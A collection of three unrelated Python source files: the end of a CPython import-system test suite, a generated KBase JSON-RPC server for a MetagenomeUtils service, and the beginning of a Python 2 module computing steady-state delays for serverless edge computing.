# without the tag), it is importable. The __cached__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
self.assertEqual(m.__cached__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
@skip_if_dont_write_bytecode
def test_package___cached__(self):
# Like test___cached__ but for packages.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_package___cached___from_pyc(self):
# Like test___cached__ but ensuring __cached__ when imported from a
# PEP 3147 pyc file.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
unload('pep3147.foo')
unload('pep3147')
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_recompute_pyc_same_second(self):
# Even when the source file doesn't change timestamp, a change in
# source size is enough to trigger recomputation of the pyc file.
__import__(TESTFN)
unload(TESTFN)
with open(self.source, 'a') as fp:
print("x = 5", file=fp)
m = __import__(TESTFN)
self.assertEqual(m.x, 5)
class TestSymbolicallyLinkedPackage(unittest.TestCase):
package_name = 'sample'
tagged = package_name + '-tagged'
def setUp(self):
test.support.rmtree(self.tagged)
test.support.rmtree(self.package_name)
self.orig_sys_path = sys.path[:]
# create a sample package; imagine you have a package with a tag and
# you want to symbolically link it from its untagged name.
os.mkdir(self.tagged)
self.addCleanup(test.support.rmtree, self.tagged)
init_file = os.path.join(self.tagged, '__init__.py')
test.support.create_empty_file(init_file)
assert os.path.exists(init_file)
# now create a symlink to the tagged package
# sample -> sample-tagged
os.symlink(self.tagged, self.package_name, target_is_directory=True)
self.addCleanup(test.support.unlink, self.package_name)
importlib.invalidate_caches()
self.assertEqual(os.path.isdir(self.package_name), True)
assert os.path.isfile(os.path.join(self.package_name, '__init__.py'))
def tearDown(self):
sys.path[:] = self.orig_sys_path
# regression test for issue6727
@unittest.skipUnless(
not hasattr(sys, 'getwindowsversion')
or sys.getwindowsversion() >= (6, 0),
"Windows Vista or later required")
@test.support.skip_unless_symlink
def test_symlinked_dir_importable(self):
# make sure sample can only be imported from the current directory.
sys.path[:] = ['.']
assert os.path.exists(self.package_name)
assert os.path.exists(os.path.join(self.package_name, '__init__.py'))
# Try to import the package
importlib.import_module(self.package_name)
@cpython_only
class ImportlibBootstrapTests(unittest.TestCase):
# These tests check that importlib is bootstrapped.
def test_frozen_importlib(self):
mod = sys.modules['_frozen_importlib']
self.assertTrue(mod)
def test_frozen_importlib_is_bootstrap(self):
from importlib import _bootstrap
mod = sys.modules['_frozen_importlib']
self.assertIs(mod, _bootstrap)
self.assertEqual(mod.__name__, 'importlib._bootstrap')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap.py'), mod.__file__)
def test_frozen_importlib_external_is_bootstrap_external(self):
from importlib import _bootstrap_external
mod = sys.modules['_frozen_importlib_external']
self.assertIs(mod, _bootstrap_external)
self.assertEqual(mod.__name__, 'importlib._bootstrap_external')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap_external.py'), mod.__file__)
def test_there_can_be_only_one(self):
# Issue #15386 revealed a tricky loophole in the bootstrapping
# This test is technically redundant, since the bug caused importing
# this test module to crash completely, but it helps prove the point
from importlib import machinery
mod = sys.modules['_frozen_importlib']
self.assertIs(machinery.ModuleSpec, mod.ModuleSpec)
@cpython_only
class GetSourcefileTests(unittest.TestCase):
"""Test importlib._bootstrap_external._get_sourcefile() as used by the C API.
Because of the peculiarities of the need of this function, the tests are
knowingly whitebox tests.
"""
def test_get_sourcefile(self):
# Given a valid bytecode path, return the path to the corresponding
# source file if it exists.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = True;
path = TESTFN + '.pyc'
expect = TESTFN + '.py'
self.assertEqual(_get_sourcefile(path), expect)
def test_get_sourcefile_no_source(self):
# Given a valid bytecode path without a corresponding source path,
# return the original bytecode path.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = False;
path = TESTFN + '.pyc'
self.assertEqual(_get_sourcefile(path), path)
def test_get_sourcefile_bad_ext(self):
# Given a path with an invalid bytecode extension, return the
# bytecode path passed as the argument.
path = TESTFN + '.bad_ext'
self.assertEqual(_get_sourcefile(path), path)
class ImportTracebackTests(unittest.TestCase):
def setUp(self):
os.mkdir(TESTFN)
self.old_path = sys.path[:]
sys.path.insert(0, TESTFN)
def tearDown(self):
sys.path[:] = self.old_path
rmtree(TESTFN)
def create_module(self, mod, contents, ext=".py"):
fname = os.path.join(TESTFN, mod + ext)
with open(fname, "w") as f:
f.write(contents)
self.addCleanup(unload, mod)
importlib.invalidate_caches()
return fname
def assert_traceback(self, tb, files):
deduped_files = []
while tb:
code = tb.tb_frame.f_code
fn = code.co_filename
if not deduped_files or fn != deduped_files[-1]:
deduped_files.append(fn)
tb = tb.tb_next
self.assertEqual(len(deduped_files), len(files), deduped_files)
for fn, pat in zip(deduped_files, files):
self.assertIn(pat, fn)
def test_nonexistent_module(self):
try:
# assertRaises() clears __traceback__
import nonexistent_xyzzy
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__])
def test_nonexistent_module_nested(self):
self.create_module("foo", "import nonexistent_xyzzy")
try:
import foo
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure(self):
self.create_module("foo", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure_nested(self):
self.create_module("foo", "import bar")
self.create_module("bar", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py', 'bar.py'])
# A few more examples from issue #15425
def test_syntax_error(self):
self.create_module("foo", "invalid syntax is invalid")
try:
import foo
except SyntaxError as e:
tb = e.__traceback__
else:
self.fail("SyntaxError should have been raised")
self.assert_traceback(tb, [__file__])
def _setup_broken_package(self, parent, child):
pkg_name = "_parent_foo"
self.addCleanup(unload, pkg_name)
pkg_path = os.path.join(TESTFN, pkg_name)
os.mkdir(pkg_path)
# Touch the __init__.py
init_path = os.path.join(pkg_path, '__init__.py')
with open(init_path, 'w') as f:
f.write(parent)
bar_path = os.path.join(pkg_path, 'bar.py')
with open(bar_path, 'w') as f:
f.write(child)
importlib.invalidate_caches()
return init_path, bar_path
def test_broken_submodule(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_from(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_parent(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
def test_broken_parent_from(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
@cpython_only
def test_import_bug(self):
# We simulate a bug in importlib and check that it's not stripped
# away from the traceback.
self.create_module("foo", "")
importlib = sys.modules['_frozen_importlib_external']
if 'load_module' in vars(importlib.SourceLoader):
old_exec_module = importlib.SourceLoader.exec_module
else:
old_exec_module = None
try:
def exec_module(*args):
1/0
importlib.SourceLoader.exec_module = exec_module
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, '<frozen importlib', __file__])
finally:
if old_exec_module is None:
del importlib.SourceLoader.exec_module
else:
importlib.SourceLoader.exec_module = old_exec_module
@unittest.skipUnless(TESTFN_UNENCODABLE, 'need TESTFN_UNENCODABLE')
def test_unencodable_filename(self):
# Issue #11619: The Python parser and the import machinery must not
# encode filenames, especially on Windows
pyname = script_helper.make_script('', TESTFN_UNENCODABLE, 'pass')
self.addCleanup(unlink, pyname)
name = pyname[:-3]
script_helper.assert_python_ok("-c", "mod = __import__(%a)" % name,
__isolated=False)
class CircularImportTests(unittest.TestCase):
"""See the docstrings of the modules being imported for the purpose of the
test."""
def tearDown(self):
"""Make sure no modules pre-exist in sys.modules which are being used to
test."""
for key in list(sys.modules.keys()):
if key.startswith('test.test_import.data.circular_imports'):
del sys.modules[key]
def test_direct(self):
try:
import test.test_import.data.circular_imports.basic
except ImportError:
self.fail('circular import through relative imports failed')
def test_indirect(self):
try:
import test.test_import.data.circular_imports.indirect
except ImportError:
self.fail('relative import in module contributing to circular '
'import failed')
def test_subpackage(self):
try:
import test.test_import.data.circular_imports.subpackage
except ImportError:
self.fail('circular import involving a subpackage failed')
def test_rebinding(self):
try:
import test.test_import.data.circular_imports.rebinding as rebinding
except ImportError:
self.fail('circular import with rebinding of module attribute failed')
from test.test_import.data.circular_imports.subpkg import util
self.assertIs(util.util, rebinding.util)
def test_binding(self):
try:
import test.test_import.data.circular_imports.binding
except ImportError:
self.fail('circular import with binding a submodule to a name failed')
def test_crossreference1(self):
import test.test_import.data.circular_imports.use
import test.test_import.data.circular_imports.source
def test_crossreference2(self):
with self.assertRaises(AttributeError) as cm:
import test.test_import.data.circular_imports.source
errmsg = str(cm.exception)
self.assertIn('test.test_import.data.circular_imports.source', errmsg)
self.assertIn('spam', errmsg)
self.assertIn('partially initialized module', errmsg)
self.assertIn('circular import', errmsg)
if __name__ == '__main__':
# Test needs to be a package, so we can do relative imports.
unittest.main()
|
MetagenomeUtilsServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from MetagenomeUtils.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'MetagenomeUtils'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from MetagenomeUtils.MetagenomeUtilsImpl import MetagenomeUtils # noqa @IgnorePep8
impl_MetagenomeUtils = MetagenomeUtils(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'MetagenomeUtils'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_MetagenomeUtils.file_to_binned_contigs,
name='MetagenomeUtils.file_to_binned_contigs',
types=[dict])
self.method_authentication['MetagenomeUtils.file_to_binned_contigs'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.binned_contigs_to_file,
name='MetagenomeUtils.binned_contigs_to_file',
types=[dict])
self.method_authentication['MetagenomeUtils.binned_contigs_to_file'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.export_binned_contigs_as_excel,
name='MetagenomeUtils.export_binned_contigs_as_excel',
types=[dict])
self.method_authentication['MetagenomeUtils.export_binned_contigs_as_excel'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.import_excel_as_binned_contigs,
name='MetagenomeUtils.import_excel_as_binned_contigs',
types=[dict])
self.method_authentication['MetagenomeUtils.import_excel_as_binned_contigs'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.extract_binned_contigs_as_assembly,
name='MetagenomeUtils.extract_binned_contigs_as_assembly',
types=[dict])
self.method_authentication['MetagenomeUtils.extract_binned_contigs_as_assembly'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.remove_bins_from_binned_contig,
name='MetagenomeUtils.remove_bins_from_binned_contig',
types=[dict])
self.method_authentication['MetagenomeUtils.remove_bins_from_binned_contig'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.merge_bins_from_binned_contig,
name='MetagenomeUtils.merge_bins_from_binned_contig',
types=[dict])
self.method_authentication['MetagenomeUtils.merge_bins_from_binned_contig'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.edit_bins_from_binned_contig,
name='MetagenomeUtils.edit_bins_from_binned_contig',
types=[dict])
self.method_authentication['MetagenomeUtils.edit_bins_from_binned_contig'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.get_annotated_metagenome_assembly,
name='MetagenomeUtils.get_annotated_metagenome_assembly',
types=[dict])
self.method_authentication['MetagenomeUtils.get_annotated_metagenome_assembly'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.get_annotated_metagenome_assembly_features,
name='MetagenomeUtils.get_annotated_metagenome_assembly_features',
types=[dict])
self.method_authentication['MetagenomeUtils.get_annotated_metagenome_assembly_features'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.status,
name='MetagenomeUtils.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'MetagenomeUtils ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
steadystate.py
|
"""
Compute the steady-state delays of a serverless edge computing system
"""
__author__ = "Claudio Cicconetti"
__version__ = "0.1.0"
__license__ = "MIT"
import numpy as np
from itertools import product
import scipy.sparse as sp
from scipy.linalg import norm
import threading
import time
class DegenerateException(Exception):
"""Raised when the transition matrix is degenerate"""
pass
class SteadyStateGeneric(object):
"""Steady-state simulation object"""
def __init__(self,
verbose = False):
# configuration
self.verbose = verbose
@staticmethod
def printMat(name, mat):
"Print a matrix per row, prepending the data structure name in a separate line"
print "{}: ".format(name)
if isinstance(mat, sp.dok_matrix):
for row in mat.toarray():
print row
else:
for row in mat:
print row
################################################################################
################################################################################
################################################################################
class SteadyState(SteadyStateGeneric):
"""Steady-state delays of a serverless edge computing with two options"""
def __init__(self,
configuration,
verbose = False):
super(SteadyState, self).__init__(verbose)
# input
self.chi = configuration.chi
self.tau = configuration.tau
self.x = configuration.x
self.load = configuration.load
self.mu = configuration.mu
self.association = configuration.association
#
# derived variables
#
# lazy initialization variables
self.delta = None
self.deltabar = None
self.Q = None
self.pi = None
self.delays = None
# scalars
self.nclients = self.tau.shape[0]
self.nservers = self.tau.shape[1]
self.nstates = pow(2, self.nclients)
# possible servers for each client
possible_servers = []
for i in range(self.nclients):
server_list = []
for (ndx,s) in zip(range(self.nservers),self.association[i]):
if s == 1:
server_list.append(ndx)
assert len(server_list) == 2
possible_servers.append(server_list)
self.possible_servers = np.array(possible_servers)
# server assigned to every client per state
self.state = np.zeros([self.nclients, self.nstates], dtype=int)
self.statebar = np.zeros([self.nclients, self.nstates], dtype=int)
for ndx, prod in zip(range(self.nstates), product([0, 1], repeat=self.nclients)):
for i in range(self.nclients):
self.state[i, ndx] = self.possible_servers[i][prod[i]]
self.statebar[i, ndx] = self.possible_servers[i][1-prod[i]]
# further size checks
assert self.x.shape[0] == self.nclients
assert self.load.shape[0] == self.nclients
assert self.mu.shape[0] == self.nservers
assert self.association.shape[0] == self.nclients
assert self.association.shape[1] == self.nservers
def clear(self):
"Remove all derived data structures"
self.delta = None
self.deltabar = None
self.Q = None
self.pi = None
self.delays = None
def debugPrint(self, printDelay = False):
"Print the internal data structures"
self.printMat("Network delays", self.tau)
self.printMat("Requests", self.x)
